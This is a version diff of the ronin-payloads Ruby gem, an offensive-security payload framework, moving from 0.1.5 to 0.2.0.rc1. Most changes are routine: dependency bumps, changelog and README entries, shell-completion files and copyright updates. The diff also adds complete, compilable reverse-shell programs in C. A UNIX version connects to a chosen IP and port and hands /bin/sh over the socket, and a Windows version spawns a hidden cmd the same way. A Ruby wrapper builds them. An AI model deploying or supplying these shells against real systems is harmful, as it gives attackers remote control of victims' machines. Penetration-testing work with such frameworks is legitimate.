ronin-payloads 0.1.5 → 0.2.0.rc1

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: 23ed6234ba68bb63d9e7e909987b1b4c3b5f8f75048cb9cef20c61d2a5769bcc
-  data.tar.gz: de32a35122ac1e6452b3d1a0148fcb0d4089a9fefa951084cc51cd36bd27c98c
+  metadata.gz: ed60fe626277a5add8ea5131745dffac0eab018b16f09fd75054f23c2161394c
+  data.tar.gz: 9202abaacbc4329e12b5bde844cd44f295e9baab499bba7a92727e71df95b83f
 SHA512:
-  metadata.gz: b5dfda82e5c0fcda3da9d48093921b5bcc6935460f9a6bc434b0891a60bfb08995526a3b39f540d6515faddcfc6d882d7f3f27cb64107300c1bbc0e575f43c3b
-  data.tar.gz: 5457d1110e9cd8b544e95cdb890a0d135e6e01b3a4f6b7e3fedacdd84bf9cb12005ee695a6b5b6061d824f3f631c31d75b4a1fd44aabe2f8a343b1cd6fab9c93
+  metadata.gz: b4971fbf4288c208a8d3c88b502dba08701558047b6d9f2e896adae5a0ad98d20ad26ea22f89910b6f334ffb0f7fbcbbdcef1a1158f149a63f9c3ed28974816f
+  data.tar.gz: e4d76fb7a3d91d9d32c8bb9ea7ee03006c2f6378677376ad0ad4c239a1a3eec3f764fbeb3a968442cdbe55512afc66a69d16fdd3d0f0930e6c76fd525cc330e1

data/.github/workflows/ruby.yml

@@ -26,7 +26,7 @@ jobs:
       - name: Install dependencies
         run: |
           sudo apt update -y && \
-          sudo apt install -y --no-install-recommends --no-install-suggests yasm default-jdk
+          sudo apt install -y --no-install-recommends --no-install-suggests yasm gcc-mingw-w64 default-jdk
       - name: Install dependencies
         run: bundle install --jobs 4 --retry 3
       - name: Run tests

data/.gitignore

@@ -1,4 +1,5 @@
 /coverage
+/data/completions/ronin-payloads
 /doc
 /pkg
 /man/*.[1-9]

data/ChangeLog.md

@@ -1,3 +1,48 @@
+### 0.2.0 / 2024-XX-XX
+
+* Added the {Ronin::Payloads::GroovyPayload} payload class.
+* Added the {Ronin::Payloads::NashornPayload} payload class.
+* Added the {Ronin::Payloads::Mixins::CCompiler} mixin module.
+* Added support for using cross-compilers to
+  {Ronin::Payloads::Mixins::CCompiler}.
+* Added the `libs:` keyword argument to
+  {Ronin::Payloads::Mixins::CCompiler#compile_c}.
+* Alias `compile` to {Ronin::Payloads::Mixins::TypeScript#compile_ts compile_ts}
+  in {Ronin::Payloads::Mixins::TypeScript}.
+* Alias `compile` to {Ronin::Payloads::JavaPayload#compile_java compile_java}
+  in {Ronin::Payloads::JavaPayload}
+* Alias `compile` to {Ronin::Payloads::Mixins::CCompiler#compile_c}.
+* Alias `compile` to {Ronin::Payloads::GoPayload#compile_go compile_go} in
+  {Ronin::Payloads::GoPayload#compile_go}.
+* Alias `compile` to {Ronin::Payloads::RustPayload#compile_rust compile_rust} in
+  {Ronin::Payloads::RustPayload#compile_rust}.
+* Default the `host` param to `0.0.0.0` and the `port` param to `4444` in
+  {Ronin::Payloads::Mixins::ReverseShell}.
+
+#### Payloads
+
+* Added the `php/download_exec` payload.
+* Added the `cmd/netcat/bindshell` payload.
+* Added the `cmd/ping` payload.
+* Added the `cmd/touch` payload.
+* Added the `test/cmd` payload.
+* Added the `test/url` payload.
+* Added the `groovy/reverse_shell` payload.
+* Added the `cmd/windows/download` payload.
+* Added the `cmd/zsh/reverse_shell` payload.
+* Added the `bin/windows/reverse_shell` payload.
+* Added the `bin/unix/reverse_shell` payload.
+* Added the `js/nashorn/reverse_shell` payload.
+* Added the `js/node/reverse_shell` payload.
+
+#### CLI
+
+* Added the `ronin-payloads completion` command to install shell completion
+  files for all `ronin-payloads` commands for Bash and Zsh shells.
+* The `ronin-payloads show` command can now display an example
+  `ronin-payloads build` command for the given payload.
+* Renamed the `-e` option flag to `-E` in `ronin-payloads build`.
+
 ### 0.1.5 / 2024-06-19
 
 * Fixed order of arguments passed to `TCPServer.new` in

data/Gemfile

@@ -8,7 +8,7 @@ gem 'jruby-openssl',	'~> 0.7', platforms: :jruby
 # gem 'fake_io', '~> 0.1', github: 'postmodern/fake_io.rb',
 #                          branch: 'main'
 
-# gem 'command_kit', '~> 0.4', github: 'postmodern/command_kit.rb',
+# gem 'command_kit', '~> 0.5', github: 'postmodern/command_kit.rb',
 #                              branch: 'main'
 
 # Ronin dependencies
@@ -21,8 +21,8 @@ gem 'jruby-openssl',	'~> 0.7', platforms: :jruby
 # gem 'ronin-post_ex',  '~> 0.1', github: 'ronin-rb/ronin-post_ex',
 #                                 branch: 'main'
 
-# gem 'ronin-core',     '~> 0.1', github: 'ronin-rb/ronin-core',
-#                                 branch: 'main'
+# gem 'ronin-core', '~> 0.2', github: 'ronin-rb/ronin-core',
+#                             branch: 'main'
 
 # gem 'ronin-repos',    '~> 0.1', github: 'ronin-rb/ronin-repos',
 #                                 branch: 'main'
@@ -35,7 +35,7 @@ group :development do
   gem 'simplecov',       '~> 0.20'
 
   gem 'kramdown',        '~> 2.0'
-  gem 'kramdown-man',    '~> 0.1'
+  gem 'kramdown-man',    '~> 1.0'
 
   gem 'redcarpet',       platform: :mri
   gem 'yard',            '~> 0.9'
@@ -46,4 +46,6 @@ group :development do
   gem 'stackprof',       require: false, platform: :mri
   gem 'rubocop',         require: false, platform: :mri
   gem 'rubocop-ronin',   require: false, platform: :mri
+
+  gem 'command_kit-completion', '~> 0.1', require: false
 end

data/README.md

@@ -29,8 +29,9 @@ research and development.
   possible.
 * Supports defining Payloads as plain old Ruby classes.
 * Provides base classes for a variety of languages and payload types
-  (ASM, Shellcode, C, Go, Rust, Java, JSP, PHP, Python, Ruby, NodeJS, Shell,
-  PowerShell, SQL, XML, HTML, URL).
+  (ASM, Shellcode, C, Go, Rust, Java, Groovy, JSP, PHP, Python, Ruby, NodeJS,
+  Nashorn, Shell, PowerShell, SQL, XML, HTML, URL).
+* Supports cross compiling C payloads to different architectures and OSes.
 * Provides built-in common payloads:
   * Command-line reverse shells:
     * Awk
@@ -43,8 +44,16 @@ research and development.
     * PowerShell
     * Python
     * Ruby
+    * Zsh
   * Java
     * Reverse shell
+  * JavaScript
+    * Node.js
+      * Reverse shell
+    * Nashorn
+      * Reverse shell
+  * Groovy
+    * Reverse shell
   * PHP
     * Command exec.
   * Shellcode:
@@ -63,6 +72,10 @@ research and development.
       * macOS (x86-64)
       * FreeBSD (x86)
       * NetBSD (x86)
+  * C payloads:
+    * reverse shell:
+      * Windows (x86-64 and i686)
+      * UNIX (Linux, FreeBSD, OpenBSD, NetBSD, macOS)
 * Supports adding additional encoders to payloads for further obfuscation.
 * Integrates with the [Ronin Post-Exploitation][ronin-post_ex] library.
 * Provides a simple CLI for building, encoding, launching, and generating new
@@ -92,6 +105,7 @@ Arguments:
 
 Commands:
     build
+    completion
     encode
     encoder
     encoders
@@ -107,6 +121,8 @@ List available payloads:
 
 ```shell
 $ ronin-payloads list
+  bin/unix/reverse_shell
+  bin/windows/reverse_shell
   cmd/awk/reverse_shell
   cmd/bash/reverse_shell
   cmd/lua/reverse_shell
@@ -117,7 +133,12 @@ $ ronin-payloads list
   cmd/powershell/reverse_shell
   cmd/python/reverse_shell
   cmd/ruby/reverse_shell
+  cmd/windows/download
+  cmd/zsh/reverse_shell
+  groovy/reverse_shell
   java/reverse_shell
+  js/nashorn/reverse_shell
+  js/node/reverse_shell
   php/cmd_exec
   php/download_exec
   shellcode/freebsd/x86/bind_shell
@@ -317,7 +338,7 @@ end
 * [ronin-support] ~> 1.0
 * [ronin-code-asm] ~> 1.0
 * [ronin-post_ex] ~> 0.1
-* [ronin-core] ~> 0.1
+* [ronin-core] ~> 0.2
 * [ronin-repos] ~> 0.1
 
 ## Install
@@ -343,7 +364,7 @@ gem.add_dependency 'ronin-payloads', '~> 0.1'
 1. [Fork It!](https://github.com/ronin-rb/ronin-payloads/fork)
 2. Clone It!
 3. `cd ronin-payloads/`
-4. `bundle install`
+4. `./scripts/setup`
 5. `git checkout -b my_feature`
 6. Code It!
 7. `bundle exec rake spec`
@@ -360,7 +381,7 @@ malicious software (malware) or malicious in nature.
 
 ## License
 
-Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
+Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
 
 ronin-payloads is free software: you can redistribute it and/or modify
 it under the terms of the GNU Lesser General Public License as published

data/Rakefile

@@ -32,3 +32,13 @@ task :docs => :yard
 
 require 'kramdown/man/task'
 Kramdown::Man::Task.new
+
+require 'command_kit/completion/task'
+CommandKit::Completion::Task.new(
+  class_file:  'ronin/payloads/cli',
+  class_name:  'Ronin::Payloads::CLI',
+  input_file:  'data/completions/ronin-payloads.yml',
+  output_file: 'data/completions/ronin-payloads'
+)
+
+task :setup => %w[man command_kit:completion]

data/data/completions/ronin-payloads

@@ -0,0 +1,127 @@
+# ronin-payloads completion                                -*- shell-script -*-
+
+# This bash completions script was generated by
+# completely (https://github.com/dannyben/completely)
+# Modifying it manually is not recommended
+
+_ronin-payloads_completions_filter() {
+  local words="$1"
+  local cur=${COMP_WORDS[COMP_CWORD]}
+  local result=()
+
+  if [[ "${cur:0:1}" == "-" ]]; then
+    echo "$words"
+  
+  else
+    for word in $words; do
+      [[ "${word:0:1}" != "-" ]] && result+=("$word")
+    done
+
+    echo "${result[*]}"
+
+  fi
+}
+
+_ronin-payloads_completions() {
+  local cur=${COMP_WORDS[COMP_CWORD]}
+  local compwords=("${COMP_WORDS[@]:1:$COMP_CWORD-1}")
+  local compline="${compwords[*]}"
+
+  case "$compline" in
+    'encode'*'--encoder')
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur" )
+      ;;
+
+    'build'*'--encoder')
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur" )
+      ;;
+
+    'build'*'--output')
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -A file -- "$cur" )
+      ;;
+
+    'encoder'*'--file')
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -A file -- "$cur" )
+      ;;
+
+    'launch'*'--file')
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -A file -- "$cur" )
+      ;;
+
+    'build'*'--file')
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -A file -- "$cur" )
+      ;;
+
+    'show'*'--file')
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -A file -- "$cur" )
+      ;;
+
+    'completion'*)
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -W "$(_ronin-payloads_completions_filter "--print --install --uninstall")" -- "$cur" )
+      ;;
+
+    'encoder'*'-f')
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -A file -- "$cur" )
+      ;;
+
+    'launch'*'-f')
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -A file -- "$cur" )
+      ;;
+
+    'encode'*'-E')
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur" )
+      ;;
+
+    'build'*'-f')
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -A file -- "$cur" )
+      ;;
+
+    'build'*'-o')
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -A file -- "$cur" )
+      ;;
+
+    'build'*'-E')
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads encoders)")" -- "$cur" )
+      ;;
+
+    'encoder'*)
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -W "$(_ronin-payloads_completions_filter "--verbose -v --file -f $(ronin-payloads encoders)")" -- "$cur" )
+      ;;
+
+    'show'*'-f')
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -A file -- "$cur" )
+      ;;
+
+    'encode'*)
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -W "$(_ronin-payloads_completions_filter "--format -F --encoder -E --param -p --string -s")" -- "$cur" )
+      ;;
+
+    'launch'*)
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -W "$(_ronin-payloads_completions_filter "--file -f --param -p --debug -D $(ronin-payloads list)")" -- "$cur" )
+      ;;
+
+    'build'*)
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -W "$(_ronin-payloads_completions_filter "--file -f --format -F --param -p --output -o --encoder -E --encoder-param --debug -D $(ronin-payloads list)")" -- "$cur" )
+      ;;
+
+    'show'*)
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -W "$(_ronin-payloads_completions_filter "--file -f --verbose -v $(ronin-payloads list)")" -- "$cur" )
+      ;;
+
+    'info'*)
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -W "$(_ronin-payloads_completions_filter "$(ronin-payloads list)")" -- "$cur" )
+      ;;
+
+    'new'*)
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -W "$(_ronin-payloads_completions_filter "--type -t --author -a --author-email -e --summary -S --description -D --reference -R")" -- "$cur" )
+      ;;
+
+    *)
+      while read -r; do COMPREPLY+=( "$REPLY" ); done < <( compgen -W "$(_ronin-payloads_completions_filter "--version -V help build completion encode encoder encoders irb launch list new show ls info")" -- "$cur" )
+      ;;
+
+  esac
+} &&
+complete -F _ronin-payloads_completions ronin-payloads
+
+# ex: filetype=sh

data/data/completions/ronin-payloads.yml

@@ -0,0 +1,16 @@
+---
+ronin-payloads encoder:
+  - $(ronin-payloads encoders)
+ronin-payloads encode*--encoder: &encode_encoder
+  - $(ronin-payloads encoders)
+ronin-payloads encode*-E: *encode_encoder
+ronin-payloads build*--encoder: &build_encoder
+  - $(ronin-payloads encoders)
+ronin-payloads build*-E: *build_encoder
+ronin-payloads show: &show
+  - $(ronin-payloads list)
+ronin-payloads info: *show
+ronin-payloads build:
+  - $(ronin-payloads list)
+ronin-payloads launch:
+  - $(ronin-payloads list)

data/gemspec.yml

@@ -22,8 +22,10 @@ metadata:
   rubygems_mfa_required: 'true'
 
 generated_files:
+  - data/completions/ronin-payloads
   - man/ronin-payloads.1
   - man/ronin-payloads-build.1
+  - man/ronin-payloads-completion.1
   - man/ronin-payloads-encode.1
   - man/ronin-payloads-encoder.1
   - man/ronin-payloads-encoders.1
@@ -39,7 +41,7 @@ dependencies:
   ronin-support: ~> 1.0
   ronin-code-asm: ~> 1.0
   ronin-post_ex: ~> 0.1
-  ronin-core: ~> 0.1
+  ronin-core: ~> 0.2.0.rc1
   ronin-repos: ~> 0.1
 
 development_dependencies:

data/lib/ronin/payloads/asm_payload.rb

@@ -3,7 +3,7 @@
 # ronin-payloads - A Ruby micro-framework for writing and running exploit
 # payloads.
 #
-# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
 #
 # ronin-payloads is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published

data/lib/ronin/payloads/binary_payload.rb

@@ -3,7 +3,7 @@
 # ronin-payloads - A Ruby micro-framework for writing and running exploit
 # payloads.
 #
-# Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com)
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
 #
 # ronin-payloads is free software: you can redistribute it and/or modify
 # it under the terms of the GNU Lesser General Public License as published

data/lib/ronin/payloads/builtin/bin/unix/reverse_shell.c

@@ -0,0 +1,61 @@
+#include <sys/socket.h>
+#include <unistd.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+#include <sys/types.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#if !defined(CLIENT_IP)
+#error "must define CLIENT_IP"
+#endif
+
+#if !defined(CLIENT_PORT)
+#error "must define CLIENT_PORT"
+#endif
+
+int main(void)
+{
+	pid_t pid = fork();
+
+	if (pid == -1)
+	{
+		write(2, "error: fork failed.\n", 21);
+		return 1;
+	}
+
+	if (pid > 0)
+	{
+		return 0;
+	}
+
+	struct sockaddr_in sa;
+
+	sa.sin_family = AF_INET;
+	sa.sin_port = htons(CLIENT_PORT);
+	sa.sin_addr.s_addr = inet_addr(CLIENT_IP);
+
+	int sockt = socket(AF_INET, SOCK_STREAM, 0);
+
+#ifdef WAIT_FOR_CLIENT
+	while (connect(sockt, (struct sockaddr *) &sa, sizeof(sa)) != 0)
+	{
+		sleep(5);
+	}
+#else
+	if (connect(sockt, (struct sockaddr *) &sa, sizeof(sa)) != 0)
+	{
+		write(2, "error: connect failed.\n", 24);
+		return 1;
+	}
+#endif
+
+	dup2(sockt, 0);
+	dup2(sockt, 1);
+	dup2(sockt, 2);
+
+	char * const argv[] = {"/bin/sh", NULL};
+	execve("/bin/sh", argv, NULL);
+	return 0;
+}

data/lib/ronin/payloads/builtin/bin/unix/reverse_shell.rb

@@ -0,0 +1,84 @@
+# frozen_string_literal: true
+#
+# ronin-payloads - A Ruby micro-framework for writing and running exploit
+# payloads.
+#
+# Copyright (c) 2007-2024 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# ronin-payloads is free software: you can redistribute it and/or modify
+# it under the terms of the GNU Lesser General Public License as published
+# by the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# ronin-payloads is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU Lesser General Public License for more details.
+#
+# You should have received a copy of the GNU Lesser General Public License
+# along with ronin-payloads.  If not, see <https://www.gnu.org/licenses/>.
+#
+
+require 'ronin/payloads/c_payload'
+require 'ronin/payloads/metadata/os'
+require 'ronin/payloads/mixins/reverse_shell'
+require 'ronin/payloads/mixins/tempfile'
+
+module Ronin
+  module Payloads
+    module Bin
+      module UNIX
+        #
+        # UNIX C reverse shell that executes "cmd".
+        #
+        class ReverseShell < CPayload
+
+          include Metadata::OS
+          include Mixins::ReverseShell
+          include Mixins::Tempfile
+
+          register 'bin/unix/reverse_shell'
+
+          os :unix
+
+          author "postmodern"
+
+          summary 'UNIX C reverse shell'
+          description <<~DESC
+            UNIX reverse shell that executes "cmd" and is written in C.
+          DESC
+
+          references [
+            "https://github.com/izenynn/c-reverse-shell#readme",
+            "https://github.com/izenynn/c-reverse-shell/blob/main/linux.c"
+          ]
+
+          param :os, Enum[
+                       :linux,
+                       :macos,
+                       :freebsd
+                     ], desc: 'The target OS'
+
+          # The path to the `reverse_shell.c` file.
+          SOURCE_FILE = File.join(__dir__,'reverse_shell.c')
+
+          #
+          # Builds the shellcode.
+          #
+          def build
+            tempfile('reverse_shell', ext: '.c') do |tempfile|
+              compile(SOURCE_FILE, defs: {
+                                     'CLIENT_IP'   => "\"#{params[:host]}\"",
+                                     'CLIENT_PORT' => params[:port]
+                                   },
+                                   output: tempfile.path)
+
+              @payload = File.binread(tempfile.path)
+            end
+          end
+
+        end
+      end
+    end
+  end
+end

data/lib/ronin/payloads/builtin/bin/windows/reverse_shell.c

@@ -0,0 +1,63 @@
+#include <winsock2.h>
+#include <windows.h>
+#include <io.h>
+#include <process.h>
+#include <sys/types.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#if !defined(CLIENT_IP)
+#error "must define CLIENT_IP"
+#endif
+
+#if !defined(CLIENT_PORT)
+#error "must define CLIENT_PORT"
+#endif
+
+int main(void)
+{
+	WSADATA wsaData;
+
+	if (WSAStartup(MAKEWORD(2 ,2), &wsaData) != 0)
+	{
+		write(2, "error: WSASturtup failed.\n", 27);
+		return 1;
+	}
+
+	int port = CLIENT_PORT;
+	struct sockaddr_in sa;
+
+	sa.sin_family = AF_INET;
+	sa.sin_port = htons(port);
+	sa.sin_addr.s_addr = inet_addr(CLIENT_IP);
+
+	SOCKET sockt = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
+
+#ifdef WAIT_FOR_CLIENT
+	while (connect(sockt, (struct sockaddr *) &sa, sizeof(sa)) != 0)
+	{
+		Sleep(5000);
+	}
+#else
+	if (connect(sockt, (struct sockaddr *) &sa, sizeof(sa)) != 0)
+	{
+		write(2, "error: connect failed.\n", 24);
+		return 1;
+	}
+#endif
+
+	STARTUPINFO sinfo;
+
+	memset(&sinfo, 0, sizeof(sinfo));
+	sinfo.cb = sizeof(sinfo);
+	sinfo.dwFlags = (STARTF_USESTDHANDLES);
+	sinfo.hStdInput = (HANDLE)sockt;
+	sinfo.hStdOutput = (HANDLE)sockt;
+	sinfo.hStdError = (HANDLE)sockt;
+
+	PROCESS_INFORMATION pinfo;
+
+	CreateProcessA(NULL, "cmd", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &sinfo, &pinfo);
+	return 0;
+}